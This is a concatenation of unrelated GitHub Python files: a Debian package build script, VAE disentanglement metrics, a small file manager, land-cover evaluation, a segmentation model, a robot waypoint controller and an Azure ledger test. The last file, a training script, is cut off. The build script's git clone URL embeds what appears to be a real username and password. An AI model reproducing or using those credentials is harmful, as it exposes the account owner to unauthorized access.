/root/tinc/tincd\"):\n print(\"compile tincd failed.\")\n exit(1)\n\n\nif len(sys.argv) == 1 \\\n or (len(sys.argv) > 1\n and (sys.argv[1] == \"dnet\" or sys.argv[1] == \"init\")):\n dnet_dir = \"/root/dnetnode\"\n if not os.path.exists(dnet_dir):\n os.system(\"git clone -b origin_tinc http://bowen.yan:siteview123%21%40%23@git.vlan.cn/dnet/dnetnode \"\n + dnet_dir)\n os.chdir(dnet_dir)\n else:\n os.chdir(dnet_dir)\n os.system(\"git pull --rebase\")\n\n path = os.getenv(\"PATH\")\n path += \":$HOME/.cargo/bin\"\n os.putenv(\"PATH\", path)\n os.putenv(\"OPENSSL_DIR\", \"/usr/local\")\n os.putenv(\"OPENSSL_STATIC\", \"1\")\n os.chdir(dnet_dir)\n os.system(\"/root/.cargo/bin/rustup update\")\n os.system(\"/root/.cargo/bin/cargo build --release\")\n\nos.chdir(\"/root\")\nbuild_dir = \"/root/dnet\"\nos.system(\"mkdir -p /root/dnet/DEBIAN /root/dnet/lib/systemd/system \"\n \"/root/dnet/opt/dnet /root/dnet/opt/dnet/tinc/lib \"\n \"/root/dnet/opt/dnet/tinc\")\nos.system(\"cp /root/dnetnode/cert.pem ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/key.pem ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/settings.example.toml ./dnet/opt/dnet/settings.example.toml\")\nos.system(\"cp /root/dnetnode/target/release/dnet-daemon ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/target/release/dnet ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/target/release/tinc-report ./dnet/opt/dnet/tinc\")\nos.system(\"cp /root/dnetnode/compile_script/control ./dnet/DEBIAN\")\nos.system(\"cp 
/root/dnetnode/compile_script/dnet.service ./dnet/lib/systemd/system/dnet.service\")\nos.system(\"cp /root/tinc/* /root/dnet/opt/dnet/tinc -rf\")\nos.system(\"dpkg-deb -b /root/dnet dnet.deb\")\nos.system(\"cp /root/dnet.deb /mnt/\")\nprint(\"finish\")\n","repo_name":"yanbowen1994/dnetnode","sub_path":"compile_script/vagrant/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6850774227","text":"import tensorflow_datasets as tfds\nimport numpy as np\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\n\nfrom mig_compute import estimate_entropies\n\ndef get_dsprites_tf_dataset():\n # data have been shuffled by tensorflow\n # data will be batched before training\n return tfds.load('Dsprites', split='train', batch_size=256)\n\nclass OrderedDsprites:\n def __init__(self, data_file='dsprites_ordered.npz'):\n # load dataset\n dataset = np.load(data_file, allow_pickle=True, encoding=\"latin1\")\n self.imgs = dataset[\"imgs\"][:]\n self.latent_sizes = dataset[\"metadata\"][()][\"latents_sizes\"][:]\n # get rid of color dimension here\n self.latent_sizes = self.latent_sizes[1:]\n self.latent_bases = np.concatenate((\n self.latent_sizes[::-1].cumprod()[::-1][1:], np.array([1,]),))\n\n def sample_latent(self, nsamples=1):\n samples = np.zeros((nsamples, self.latent_sizes.size), dtype=int)\n for lat_i, lat_size in enumerate(self.latent_sizes):\n samples[:, lat_i] = np.random.randint(lat_size, size=nsamples)\n return samples\n\n def get_images_from_latent(self, latent_samples):\n # latent to indices\n indices = np.dot(latent_samples, self.latent_bases).astype(int)\n return self.imgs[indices]\n \n def compute_zdiff_y(self, vae, n_zdiff_per_y, n_img_per_zdiff):\n # create arrays\n y_size = self.latent_sizes.size\n z_diff_all = np.zeros((y_size, n_zdiff_per_y, vae.latent_dim), dtype=np.float32)\n y_all = np.zeros((y_size, n_zdiff_per_y), dtype=int)\n \n for y in range(y_size):\n # sample\n v1 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n v2 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n # keey y the same\n v1[:, y] = v2[:, y]\n # get images\n x1 = self.get_images_from_latent(v1)\n x2 = self.get_images_from_latent(v2)\n # encode \n z1 = vae.encoder.predict(x1)[0]\n z2 = vae.encoder.predict(x2)[0]\n # z_diff\n z_diff = np.abs(z1 - z2)\n # separate dimensions: n_zdiff_per_y, n_img_per_zdiff\n z_diff = z_diff.reshape((n_zdiff_per_y, n_img_per_zdiff, vae.latent_dim))\n # take average over n_img_per_zdiff\n z_diff_all[y, :, :] = np.mean(z_diff, axis=1)\n # y\n y_all[y, :] = y\n \n # merge dimensions: y_size, n_zdiff_per_y\n z_diff_all = z_diff_all.reshape((y_size * n_zdiff_per_y, vae.latent_dim))\n y_all = y_all.reshape((y_size * n_zdiff_per_y))\n \n # shuffle z_diff and y consistently\n shuffle_indices = np.arange(0, y_size * n_zdiff_per_y)\n np.random.shuffle(shuffle_indices)\n z_diff_all = z_diff_all[shuffle_indices]\n y_all = y_all[shuffle_indices]\n return z_diff_all, y_all\n \n def compute_disentangle_metric_score(self, vae, n_zdiff_per_y=5000, \n n_img_per_zdiff=64, random_seed=0):\n # seed\n np.random.seed(random_seed)\n # prep training and test data\n zdiff, y = self.compute_zdiff_y(vae, n_zdiff_per_y, n_img_per_zdiff)\n # sklearn linear classifier\n classifier = make_pipeline(\n StandardScaler(), \n SGDClassifier(loss=\"log\", early_stopping=True, 
random_state=random_seed)\n        )\n        # train\n        classifier.fit(zdiff, y)\n        # score (note: evaluated on the same data used for fitting, not a held-out test set)\n        return classifier.score(zdiff, y)\n    \n    def compute_MIG(self, vae, n_samples):\n        N = len(self.imgs)\n        K = vae.latent_dim\n\n        # encode all images\n        qz_mean = np.zeros((N, K), dtype=np.float32)\n        qz_log_var = np.zeros((N, K), dtype=np.float32)\n        qz_sample = np.zeros((N, K), dtype=np.float32)\n        batch_size = 256\n        for ibatch, start in enumerate(range(0, N, batch_size)):\n            end = min(start + batch_size, N)\n            z_mean, z_log_var, z_sample = vae.encoder.predict(self.imgs[start:end])\n            qz_mean[start:end] = z_mean\n            qz_log_var[start:end] = z_log_var\n            qz_sample[start:end] = z_sample\n        \n        # marginal entropies\n        marginal_entropies = estimate_entropies(\n            qz_mean, qz_log_var, qz_sample, n_samples)\n        \n        # conditional entropies\n        cond_entropies = np.zeros((4, K), dtype=np.float32)\n        \n        # index slices for the entire structured data\n        slices = []\n        for sz in self.latent_sizes:\n            slices.append(slice(sz))\n        slices.append(slice(K))\n        \n        # reshape data to structured\n        reshape_id = list(self.latent_sizes) + [K,]\n        qz_mean = qz_mean.reshape(reshape_id)\n        qz_log_var = qz_log_var.reshape(reshape_id)\n        qz_sample = qz_sample.reshape(reshape_id)\n        \n        # iter over (scale, rotation, pos_x, pos_y)\n        for index_y in range(1, len(self.latent_sizes)):\n            slices_copy = slices.copy()\n            n_y = self.latent_sizes[index_y]\n            # iter over y\n            for i_y in range(n_y):\n                slices_copy[index_y] = i_y\n                qz_mean_sub = qz_mean[tuple(slices_copy)].copy().reshape((N // n_y, K))\n                qz_log_var_sub = qz_log_var[tuple(slices_copy)].copy().reshape((N // n_y, K))\n                qz_sample_sub = qz_sample[tuple(slices_copy)].copy().reshape((N // n_y, K))\n                cond_ent = estimate_entropies(\n                    qz_mean_sub, qz_log_var_sub, qz_sample_sub, n_samples)\n                cond_entropies[index_y - 1, :] += cond_ent / n_y\n        \n        # compute MIG\n        factor_entropies = self.latent_sizes[1:]\n        mutual_infos = marginal_entropies[None] - cond_entropies\n        mutual_infos = np.clip(np.sort(mutual_infos, axis=1)[:, ::-1], a_min=0, a_max=None)\n        mi_normed = mutual_infos / np.log(factor_entropies)[:, None]\n        mig = np.mean(mi_normed[:, 0] - mi_normed[:, 1])\n        return mig\n    \n","repo_name":"jamesacris/constrained-vae","sub_path":"dSprites_beta_VAE/dsprites_data.py","file_name":"dsprites_data.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"9415850716","text":"import os\r\nimport shutil\r\n\r\nfrom Log.log_decorator import log\r\nfrom Log.logger import logger\r\n\r\n\r\n@log\r\ndef create_file(name, text=None):\r\n    with open(name, 'w', encoding='utf-8') as f:\r\n        if text:\r\n            f.write(text)\r\n\r\n\r\n@log\r\ndef create_folder(name):\r\n    try:\r\n        os.mkdir(name)\r\n    except FileExistsError:\r\n        logger.critical(f'Directory {name} already exists')\r\n\r\n\r\n@log\r\ndef get_list(folders_only=False):\r\n    result = os.listdir()\r\n    if folders_only:\r\n        result = [f for f in result if os.path.isdir(f)]\r\n    print(result)\r\n\r\n\r\n@log\r\ndef delete_file(name):\r\n    if os.path.isdir(name):\r\n        os.rmdir(name)\r\n    else:\r\n        os.remove(name)\r\n\r\n\r\n@log\r\ndef change_dir(name):\r\n    os.chdir(name)\r\n    logger.info(f'Working directory changed to {os.getcwd()}')\r\n    print(os.getcwd())\r\n\r\n\r\n@log\r\ndef copy_file(name, new_name):\r\n    if os.path.isdir(name):\r\n        shutil.copytree(name, new_name)\r\n    else:\r\n        shutil.copy(name, new_name)\r\n\r\n\r\ndef print_help():\r\n    \"\"\"\r\n    Print help for the supported commands\r\n    :return:\r\n    \"\"\"\r\n    
print('Supported commands:')\r\n    print('list - list files and directories')\r\n    print('list_True - list directories only')\r\n    print('create_file - create a file')\r\n    print('create_folder - create a directory')\r\n    print('delete - delete a file or directory')\r\n    print('copy - copy a file or directory')\r\n    print('help - show hints for the commands')\r\n    print('exit - quit the program')\r\n\r\n\r\n# Debugging\r\n\r\nif __name__ == '__main__':\r\n    create_file('test.dat')\r\n    create_file('test.dat', 'test text')\r\n    create_folder('test_folder 1')\r\n    get_list()\r\n    get_list(True)\r\n    delete_file('test.dat')\r\n    delete_file('test_folder 1')\r\n    copy_file('test.dat', 'new_test.dat')\r\n    copy_file('test_folder 1', 'new_test_folder 1')\r\n","repo_name":"nikolaeff80/Console_File_Manager","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"42604868882","text":"\n###############################################################################\n#   NOTICE THIS CODE ONLY REFERS TO MLP3X3, IT IS POSSIBLE TO MODIFY IT       #\n#   FOR OTHER CLASSIFIERS BY JUST CHANGING path. ANYWAY, IT IS IMPORTANT     #\n#   TO CHECK LABELS SECTION WHEN PLOTTING AS THEY ARE CLASSIFIER SPECIFIC     #\n###############################################################################\n\n\nimport os \nimport numpy as np\nimport rasterio\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.special import rel_entr\n\n#%%\n\nlucas_stat_path = 'C:/Users/drikb/Desktop/Tirocinio/GRAPH NEURAL NETWORKS/Random forest project/Dati/LUCAS/Lucas statistics/'\n\nlucas_stat = pd.read_csv(lucas_stat_path + 'lan_lcv_ovw_1_Data.csv', encoding='latin-1')\n\n#%%\n\npath = 'C:/Users/drikb/Desktop/Land Cover Classifier/Predictions/RF3x3/'\n\nall_percentages = []\nfor trial in os.listdir(path):\n    pred_path = path + trial + '/'\n    percentages = []\n    for img in os.listdir(pred_path):\n        if img.endswith('.tif'):\n            image = rasterio.open(pred_path + img)\n            predictions = image.read(1)\n            tot = len(np.where(predictions != 0)[0])\n            image_percentages = []\n            for category in np.unique(predictions)[1:]:\n                num = len(np.where(predictions == category)[0])\n                image_percentages.append(num/tot)\n            percentages.append(image_percentages)\n    all_percentages.append(percentages)\n    \n#%%\n\nperc_array = np.array(all_percentages)\n\nperc_array = np.mean(perc_array, axis = 1)\n\nperc_mean = np.mean(perc_array, axis = 0)\nperc_std = np.std(perc_array, axis = 0)\n \n\ndescription = np.array(['Artificial land',\n                        'Cropland',\n                        'Woodland',\n                        'Shrubland',\n                        'Grassland',\n                        'Bareland',\n                        'Water',\n                        'Wetlands'])\n\noverall_percentages = pd.DataFrame(np.array([description, perc_mean, perc_std]).T, columns = ['Land Cover', 'Value', 'std']) \n\n\n#%%\n\nlazio_lucas_percentages = lucas_stat[lucas_stat['GEO'] == 'Lazio'][lucas_stat['UNIT'] == 'Percentage'][lucas_stat['TIME'] == 2018]\n\n#%%\n\ncomparison_df = pd.DataFrame(np.array([overall_percentages['Land Cover'].values, \n                                       overall_percentages['Value'].values.astype('float32'), \n                                       overall_percentages['std'].values.astype('float32'),\n                                       lazio_lucas_percentages['Value'].values.astype('float32')/100]).T,\n                             columns = ['Land Cover', 'Predictions', 'std', 'Truth'])\n\n\ncomparison_df['Difference'] = comparison_df['Truth'] - comparison_df['Predictions']\ncomparison_df['Relative Difference'] = (comparison_df['Truth'] - 
comparison_df['Predictions'])/comparison_df['Truth']\n\n#%%\n\n\nresh_comp = pd.concat([comparison_df.loc[:,('Land Cover', 'Predictions', 'std')].rename(columns = {'Predictions' : 'Value'}), \n                       comparison_df.loc[:,('Land Cover', 'Truth')].rename(columns = {'Truth' : 'Value'})], \n                      axis = 0,\n                      keys = ['Predictions', 'Truth'],\n                      names = ['Category', 'ID']).reset_index()\n\nresh_comp['CV'] = resh_comp['std']/resh_comp['Value']\n\n\n\nresh_comp['std'] = resh_comp['std'].fillna(0)  # fill missing std values with 0 and keep the result\n\n#%%\n\n###############################################################################\n#                        DISTRIBUTION EVALUATION                              #\n\ndifferences_frame = pd.DataFrame(perc_array.T)\ndifferences_frame = pd.concat([differences_frame, comparison_df[['Truth', 'Land Cover']]], axis = 1)\n\n\n# MEAN DIFFERENCE # # # # # # \neach_difference = np.array([differences_frame['Truth'] - differences_frame.iloc[:,i] for i in range(10)], dtype = 'float32').T\n\nmean_each_diff = np.mean(abs(each_difference), axis = 1)\n\nstd_each_diff = np.std(abs(each_difference), axis = 1)\n\n\nmean_diff = np.mean(mean_each_diff)\n\n\n# KULLBACK LEIBLER DIVERGENCE # # # # # # \n\nKL_each_div = np.array([sum(rel_entr(differences_frame['Truth'].values.tolist(), differences_frame.iloc[:,i].values.tolist())) for i in range(10)]).T\n\nKL_overall = sum(rel_entr(comparison_df['Truth'].values.tolist(), comparison_df['Predictions'].values.tolist()))\n \n\n#%%\n\ndisplay, (ax1, ax2, ax3) = plt.subplots(ncols = 3, figsize = (16, 6))\nsns.set_theme(style=\"whitegrid\")\n\n# FIGURE 1 - comparison\nfig1 = sns.barplot(data = resh_comp,\n                   x = 'Land Cover',\n                   y = 'Value',\n                   hue = 'Category',\n                   alpha = 0.9,\n                   palette = 'deep',\n                   edgecolor = 'black',\n                   ax = ax1) \n\n\nax1.set_xticklabels(labels = fig1.get_xticklabels(), rotation = 30)\nax1.set_yticklabels(labels = [np.arange(0, 45, 5).astype('str')[i] + '%' for i in range(9)])\n\n\n# FIGURE 2 - abs diff\nfig2 = sns.barplot(data = comparison_df,\n                   x = 'Land Cover',\n                   y = 'Difference',\n                   alpha = 0.9,\n                   color = 'darkred',\n                   dodge = False,\n                   edgecolor = 'black',\n                   ax = ax2)\nax2.set_xticklabels(labels = fig2.get_xticklabels(), rotation = 30)\nax2.set_yticklabels(labels = [np.arange(-20, 30, 5).astype('str')[i] + '%' for i in range(9)])\n\n\n# FIGURE 3 - rel diff\nfig3 = sns.barplot(data = comparison_df,\n                   x = 'Land Cover',\n                   y = 'Relative Difference',\n                   alpha = 0.9,\n                   color = 'darkred',\n                   dodge = False,\n                   edgecolor = 'black',\n                   ax = ax3)\nax3.set_xticklabels(labels = fig3.get_xticklabels(), rotation = 30)\n","repo_name":"FedericoPavesi/Lucas_points_for_Sentinel2_LandCover_Download","sub_path":"5. map_predictions_evaluation/Stability_final_evaluation.py","file_name":"Stability_final_evaluation.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"1024051395","text":"import torch.nn as nn\nimport segmentation_models_pytorch as smp\n\nfrom . 
import daformer\n\n\nclass UNetDAFormerModel(nn.Module):\n\n    def __init__(self, encoder_class, encoder_args, decoder_args, head_args):\n\n        super(UNetDAFormerModel, self).__init__()\n\n        self.encoder = getattr(smp, encoder_class)(**encoder_args).encoder\n        self.decoder = daformer.DAFormerDecoder(**decoder_args)\n        self.conv_head = nn.Sequential(\n            nn.Conv2d(\n                in_channels=self.decoder.decoder_dim,\n                out_channels=head_args['classes'],\n                kernel_size=1\n            ),\n            nn.Upsample(\n                size=head_args['upsample_size'],\n                mode=head_args['upsample_mode'],\n                align_corners=head_args['upsample_align_corners']\n            ),\n        )\n\n    def forward(self, x):\n\n        x = self.encoder(x)\n        x, _ = self.decoder(x[1:])\n        out = self.conv_head(x)\n\n        return out\n","repo_name":"gunesevitan/hubmap-hpa-hacking-the-human-body","sub_path":"src/torch_modules/unet_daformer.py","file_name":"unet_daformer.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"}
{"seq_id":"43212491462","text":"#!/usr/bin/env python3.8\n# -*- coding: utf-8 -*-\n\nimport edubot2\nfrom gs_lps import *\nimport sys\nimport math\nimport time\nimport threading\nimport logging\n\n\nclass WaypointsRobot:\n    def __init__(self):\n        self.edubot = edubot2.EduBot(enableDisplay=False)\n        self.edubot.Start()\n        logging.basicConfig(level=logging.CRITICAL)\n        self._time_start = time.time()\n        self._battery_watch_timer = time.time()\n        self._nav = us_nav()\n        self._nav.start()\n\n        self._telemetery_update_timeout = 0.005\n        self._telemetery_update_time = time.time() - self._telemetery_update_timeout\n        self._telemetery_alive_timeout = 1\n        self._telemetery_get_time = time.time() - self._telemetery_alive_timeout\n\n        self._telemetery_thread = threading.Thread(target=self._update_coordinates)\n        self._telemetery_thread.start()\n\n        self.filters = [MedianFilter(), MedianFilter(), MedianFilter()]\n\n        self.x = 0\n        self.y = 0\n        self.yaw = 0\n\n    def go_to_local_point(self, x_target, y_target, driving): # drive to the point with the given coordinates\n        if _check_dist_in_circle((self.x, self.y), (x_target, y_target), 0.3):\n            self.edubot.Beep()\n            logging.info(\"Point is reached\")\n            return True\n\n        result_1 = self._rotate_to_target(x_target, y_target, driving)\n        result_2 = self._straight_to_target(x_target, y_target, driving)\n\n        if result_2 and result_1:\n            self.edubot.Beep()\n            logging.info(\"Point is reached\")\n            return True\n        return False\n\n    def go_to_local_point_body_fixed(self, dx, dy,\n                                     driving): # drive to a point with the given offset from the current position\n        x, y, yaw = self.x, self.y, self.yaw\n        return self.go_to_local_point(x + dx, y + dy, driving)\n\n    def _rotate_to_target(self, x_target, y_target, is_driving, kp=20, ki=0, kd=0, angle_accuracy=0.2): # turn towards the given point\n        e_prev = 0\n        e_sum = 0\n        x, y, yaw = self.x, self.y, self.yaw\n        angle = _normalize_angle(math.atan2(y_target - y, x_target - x) - yaw)\n        while abs(angle) > angle_accuracy:\n            if not is_driving.is_set():\n                self.stop()\n                return False\n            self._check_battery()\n            x, y, yaw = self.x, self.y, self.yaw\n            angle = _normalize_angle(math.atan2(y_target - y, x_target - x) - yaw)\n            e_sum += angle\n            e_sum = _saturate(e_sum, 10)\n            u_s = 0\n            u_r = _saturate(kp * angle + e_sum * ki + kd * (angle - e_prev), 50)\n            self._set_speed(u_s + u_r, u_s - u_r)\n            logging.debug(\"x=%s y=%s yaw=%s u_s=%s u_r=%s\", x, y, yaw, u_s, u_r)\n            e_prev = angle\n        self.stop()\n        return True\n\n    def _straight_to_target(self, x_target, y_target, is_driving, kp=32, ki=0, kd=0, dist_accuracy=0.2, speed_max = 
80,\n                            dist_speedup=0.05, dist_slowdown=0.3): # drive to the point with dynamic heading correction\n        e_prev = 0\n        e_sum = 0\n        x, y, yaw = self.x, self.y, self.yaw\n        x_start, y_start = x, y\n        dist = math.dist((x, y), (x_target, y_target))\n        while dist > dist_accuracy:\n            if not is_driving.is_set():\n                self.stop()\n                return False\n            self._check_battery()\n\n            x, y, yaw = self.x, self.y, self.yaw\n            dist = math.dist((x, y), (x_target, y_target))\n            dist_start = math.dist((x, y), (x_start, y_start)) # distance travelled from the start point; do not overwrite dist\n            angle = _normalize_angle(math.atan2(y_target - y, x_target - x) - yaw)\n\n            if dist_start < dist_speedup:\n                u_s = speed_max * (dist_start / dist_speedup) # accelerate at the start\n            elif dist < dist_slowdown:\n                u_s = speed_max * (dist / dist_slowdown) * 2 # slow down near the finish\n            else:\n                u_s = speed_max # drive at the maximum possible linear speed + heading correction\n\n            e_sum += angle\n            e_sum = _saturate(e_sum, 10)\n            u_r = (kp * angle + kd * (angle - e_prev) + e_sum * ki) * _saturate(min(dist, dist_start) * 10, 1)\n            self._set_speed(u_s + u_r, u_s - u_r)\n\n            logging.debug(\"x=%s y=%s yaw=%s u_s=%s u_r=%s\", x, y, yaw, u_s, u_r)\n            e_prev = angle\n            time.sleep(0.025)\n        self.stop()\n        return True\n\n    def _check_battery(self):\n        if time.time() - self._battery_watch_timer >= 5: # check the battery every 5 seconds\n            voltage = self.edubot.GetPowerData()[0]\n            self._battery_watch_timer = time.time()\n            if voltage <= 6.6:\n                print(\"low battery\")\n                self.stop()\n                self.edubot.Beep()\n                self.exit_program()\n\n    def _set_speed(self, left, right):\n        left, right = _saturate(left, 100), _saturate(right, 100)\n        self.edubot.rightMotor.SetParrot(round(right))\n        self.edubot.leftMotor.SetParrot(round(-left))\n\n    def servo(self, pwm):\n        pass\n\n    def _update_coordinates(self): # get coordinates and yaw angle from the Locus positioning system\n        while True:\n            if time.time() - self._telemetery_update_time > self._telemetery_update_timeout:\n                if time.time() - self._telemetery_get_time > self._telemetery_alive_timeout:\n                    print(\"Error getting coords from lokus\")\n                    self._telemetery_get_time = time.time()\n                elif time.time() - self._telemetery_update_time > self._telemetery_alive_timeout:\n                    print(f'x: {self.x}, y: {self.y}, yaw: {self.yaw}')\n\n                pos = self._nav.get_position()\n                angles = self._nav.get_angles()\n\n                if pos is not None and angles is not None and pos[0] != 0 and pos[1] != 0:\n                    self._telemetery_update_time = time.time()\n                    self._telemetery_get_time = time.time()\n                    x, y = pos[0], pos[1]\n                    yaw = angles[2] + 3.14 # rotate the coordinate frame\n                    x, y, yaw = self.filters[0].filter(x), self.filters[1].filter(y), self.filters[2].filter(yaw)\n                    self.x, self.y, self.yaw = x, y, yaw\n\n    def get_local_position(self):\n        x, y, yaw = self.x, self.y, self.yaw\n        return [x, y, 0]\n\n    def get_attitude(self):\n        x, y, yaw = self.x, self.y, self.yaw\n        return [0, 0, yaw]\n\n    def stop(self):\n        self._set_speed(0, 0)\n\n    def get_battery_status(self):\n        voltage, current, power = self.edubot.GetPowerData()\n        return [voltage, current, power]\n\n    def exit_program(self):\n        print(\"exit\")\n        self.stop()\n        self.edubot.Release()\n\nclass MedianFilter: # median filter to suppress single-sample outliers\n    def __init__(self):\n        self.history = [-10] # per-instance history; a class-level list would be shared by the x/y/yaw filters\n\n    def filter(self, x):\n        self.history.append(x)\n        while len(self.history) > 3:\n            self.history.pop(0)\n        return sorted(self.history)[1]\n\n\ndef _saturate(value, limit): # clamp the value to the interval [-limit; limit]\n    limit = abs(limit)\n    if value < -limit:\n        return -limit\n    elif value > limit:\n        return limit\n    else:\n        return value\n\n\ndef _normalize_angle(angle):\n    while angle < -math.pi:\n        angle += 
2 * math.pi\n    while angle > math.pi:\n        angle -= 2 * math.pi\n    return angle\n\n\ndef _check_dist_in_circle(p1, p2, dist):\n    d = math.dist(p1, p2)\n    return d < dist\n\n\nif __name__ == \"__main__\":\n    robot = WaypointsRobot()\n    is_driving = threading.Event()\n    is_driving.set()\n    if len(sys.argv) > 2: # guard against missing command-line arguments\n        x_target, y_target = float(sys.argv[1]), float(sys.argv[2])\n        robot.go_to_local_point(x_target, y_target, is_driving)\n","repo_name":"GeoScan-Pioneer/edubot_sdk","sub_path":"edubot_waypoints.py","file_name":"edubot_waypoints.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"43107506306","text":"import asyncio\nimport time\n\nfrom azure.confidentialledger import (\n    ConfidentialLedgerCertificateCredential,\n    LedgerUserRole,\n)\nfrom azure.confidentialledger.aio import ConfidentialLedgerClient\n\nfrom _shared.client_test_common_async import AsyncConfidentialLedgerClientTestMixin\n\nAAD_USER_OBJECT_ID = \"a\" * 36\n\n\nclass AsyncAadCredentialClientTest(\n    AsyncConfidentialLedgerClientTestMixin.AsyncBaseTest\n):\n    def setUp(self):\n        super().setUp()\n        self.client = self.create_client_from_credential(\n            ConfidentialLedgerClient,\n            credential=self.get_credential(ConfidentialLedgerClient, is_async=True),\n            ledger_certificate_path=self.network_certificate_path,\n            endpoint=self.confidential_ledger_url,\n        )\n\n        client = self.create_client_from_credential(\n            ConfidentialLedgerClient,\n            credential=ConfidentialLedgerCertificateCredential(\n                self.user_certificate_path\n            ),\n            ledger_certificate_path=self.network_certificate_path,\n            endpoint=self.confidential_ledger_url,\n        )\n\n        aad_object_id = self.set_value_to_scrub(\n            \"CONFIDENTIAL_LEDGER_AAD_USER_OBJECT_ID\", AAD_USER_OBJECT_ID\n        )\n\n        # Since setUp cannot be async\n        task = asyncio.ensure_future(\n            client.create_or_update_user(aad_object_id, LedgerUserRole.ADMINISTRATOR)\n        )\n        while not task.done(): # done is a method, not a property\n            time.sleep(0.5)\n","repo_name":"mirespace/python-azure","sub_path":"sdk/confidentialledger/azure-confidentialledger/tests/test_confidential_ledger_client_aad_async.py","file_name":"test_confidential_ledger_client_aad_async.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
{"seq_id":"10288397858","text":"import torch\nimport numpy as np\nimport ctfishpy\nfrom ctfishpy.train_utils import Trainer, test_jaw, precacheSubjects, CTSubjectDataset\n\nimport matplotlib.pyplot as plt\nimport neptune.new as neptune\nimport os\nimport random\nimport monai\nimport math\nimport torchio as tio\nfrom neptune.new.types import File\nfrom tqdm import tqdm\nimport gc\nimport torch.nn.functional as F\nfrom pathlib2 import Path\nfrom ray import tune\n\ndef renormalise(array):\n\tarray = np.squeeze(array) # remove batch dim and channel dim -> [H, W]\n\tarray = array * 255\n\treturn array\n\ndef undo_one_hot(result, n_classes, threshold=0.5):\n\tlabel = np.zeros(result.shape[1:], dtype = 'uint8')\n\tfor i in range(n_classes):\n\t\tif len(result.shape) == 4:\n\t\t\tr = result[i, :, :, :,]\n\t\telif len(result.shape) == 3:\n\t\t\tr = result[i, :, :,]\n\t\telse:\n\t\t\traise Warning(f\"result shape unknown {result.shape}\")\n\t\tlabel[r>threshold] = i\n\treturn label\n\nif __name__ == \"__main__\":\n\n\t# dataset_path = '/home/ak18001/Data/HDD/uCT'\n\tdataset_path = '/mnt/scratch/ak18001/uCT'\n\t# dataset_path = '/mnt/storage/home/ak18001/scratch/Colloids'\n\t# 
dataset_path = '/data/mb16907/wahab/Colloids'\n\t# dataset_path = '/user/home/ak18001/scratch/Colloids/' #bc4\n\t# dataset_path = '/user/home/ak18001/scratch/ak18001/Colloids' #bp1\n\t# dataset_path = \"/home/wahab/Data/HDD/uCT\"\n\n\tctreader = ctfishpy.CTreader(dataset_path)\n\n\tcurated = [257,351,241,164,50,39,116,441,291,193,420,274,364,401,72,71,69,250,182,183,301,108,216,340,139,337,220,1,154,230,131,133,135,96,98,]\n\tdamiano = [131,216,351,39,139,69,133,135,420,441,220,291,401,250,193]\n\tready = [1, 50, 71, 72, 96, 116, 164, 182, 183, 241, 257, 274, 301, 337, 340, 364]+damiano\n\tbone = ctfishpy.JAW\n\tdataset_name = \"JAW_20230124\"\n\n\tkeys = ctreader.get_hdf5_keys(f\"{dataset_path}/LABELS/{bone}/{dataset_name}.h5\")\n\tprint(f\"all keys len {len(keys)} nums {keys}\")\n\n\tremove = [216,257,274] # 216 hi res, 257 bad seg from me, 274 sp7 fucked\n\tready = [x for x in ready if x not in remove]\n\tprint(f\"All data: {len(ready)}, nums {ready}\")\n\n\trandom.seed(42)\n\trandom.shuffle(ready)\n\t# train_data = ready[:25]\n\t# val_data = ready[25:28]\n\t# test_data = ready[25:]\n\ttrain_data = [1]#ready[:1]\n\tval_data = ready[2:3]\n\ttest_data = ready[2:3]\n\tprint(f\"train = {train_data} val = {val_data} test = {test_data}\")\n\n\tnum_workers = 10\n\n\tconfig = {\n\t\t\"lr\": 0.00263078,\n\t\t\"batch_size\": 10,\n\t\t\"n_blocks\":5,\n\t\t\"norm\": 'BATCH',\n\t\t\"epochs\": 100,\n\t\t\"start_filters\": 32,\n\t\t\"kernel_size\": 7,\n\t\t\"activation\": \"RELU\",\n\t\t\"dropout\": 0.2,\n\t\t\"patch_size\": (192,192,192),\n\t\t\"loss_function\": monai.losses.TverskyLoss(include_background=False, alpha=0.2), \n\t\t# \"loss_function\": monai.losses.GeneralizedDiceLoss(include_background=True),\n\t}\n\n\n\tparams = dict(\n\t\tdataset_path=dataset_path,\n\t\tbone=bone,\n\t\tdataset_name=dataset_name,\n\t\troiSize = (224, 224, 224),\n\t\tpatch_size = config['patch_size'], #(100,100,100),\n\t\tsampler_probs = {0:5, 1:5, 2:5, 3:6, 4:6},\n\t\ttrain_data = train_data,\n\t\tval_data = val_data,\n\t\ttest_data = test_data,\n\t\tbatch_size = config['batch_size'],\n\t\tkernel_size = config['kernel_size'],\n\t\tn_blocks = config['n_blocks'],\n\t\tnorm = config['norm'],\n\t\tloss_function = config['loss_function'],\n\t\tlr = config['lr'],\n\t\tepochs = config['epochs'],\n\t\tstart_filters = config['start_filters'],\n\t\tactivation = config['activation'],\n\t\tnum_workers = num_workers,\n\t\tn_classes = 5, #including background\n\t\trandom_seed = 42,\n\t\tdropout = config['dropout'],\n\t\tspatial_dims = 3,\n\t)\n\t\n\ttransforms = 